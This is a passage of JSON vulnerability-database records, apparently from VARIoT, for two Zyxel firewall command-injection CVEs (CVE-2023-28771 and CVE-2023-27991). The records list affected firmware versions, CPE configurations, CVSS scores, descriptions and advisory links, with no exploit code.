                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:zywall_usg_310_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.73",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:zywall_usg_310_firmware:4.73:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:zywall_usg_310:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:zywall_usg_100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.73",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:zywall_usg_100_firmware:4.73:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:zywall_usg_100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-28771"
          }
        ]
      },
      "cve": "CVE-2023-28771",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "security@zyxel.com.tw",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2023-28771",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2023-28771",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202304-1976",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-28771"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-28771"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1976"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Improper error message handling in Zyxel ZyWALL/USG series firmware versions 4.60 through 4.73, VPN series firmware versions 4.60 through 5.35, USG FLEX series firmware versions 4.60 through 5.35, and ATP series firmware versions 4.60 through 5.35, which could allow an unauthenticated attacker to execute some OS commands remotely by sending crafted packets to an affected device",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-28771"
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-28771"
          }
        ],
        "trust": 0.99
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2023-28771",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "172820",
            "trust": 1.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1976",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-28771",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-28771"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-28771"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1976"
          }
        ]
      },
      "id": "VAR-202304-2073",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.3125
      },
      "last_update_date": "2023-12-18T13:59:09.508000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel ZyWALL USG Fixes for operating system command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=234820"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1976"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-28771"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-command-injection-vulnerability-of-firewalls"
          },
          {
            "trust": 1.6,
            "url": "http://packetstormsecurity.com/files/172820/zyxel-ike-packet-decoder-unauthenticated-remote-code-execution.html"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2023-28771/"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-28771"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-28771"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-28771"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1976"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2023-28771"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-28771"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1976"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-04-25T00:00:00",
            "db": "VULMON",
            "id": "CVE-2023-28771"
          },
          {
            "date": "2023-04-25T02:15:08.743000",
            "db": "NVD",
            "id": "CVE-2023-28771"
          },
          {
            "date": "2023-04-24T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202304-1976"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-04-25T00:00:00",
            "db": "VULMON",
            "id": "CVE-2023-28771"
          },
          {
            "date": "2023-06-09T18:12:04.557000",
            "db": "NVD",
            "id": "CVE-2023-28771"
          },
          {
            "date": "2023-06-12T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202304-1976"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1976"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Zyxel ZyWALL USG Operating system command injection vulnerability",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1976"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1976"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202304-2162

    Vulnerability from variot - Updated: 2023-12-18 13:41

    The post-authentication command injection vulnerability in the CLI command of Zyxel ATP series firmware versions 4.32 through 5.35, USG FLEX series firmware versions 4.50 through 5.35, USG FLEX 50(W) firmware versions 4.16 through 5.35, USG20(W)-VPN firmware versions 4.16 through 5.35, and VPN series firmware versions 4.30 through 5.35, which could allow an authenticated attacker to execute some OS commands remotely. ATP200 firmware, ATP100 firmware, ATP700 firmware etc. ZyXEL The product has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202304-2162",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "atp500",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp700",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 500",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg20-vpn",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "atp100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "vpn300",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 50w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.16"
          },
          {
            "model": "atp100w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp200",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn1000",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg flex 100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.16"
          },
          {
            "model": "usg flex 50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 700",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "vpn50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 100w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp800",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 50w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg20-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg flex 200",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "atp100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg 20-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn1000",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 50w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg20-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp800",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn300",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn50",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 50",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009235"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-27991"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
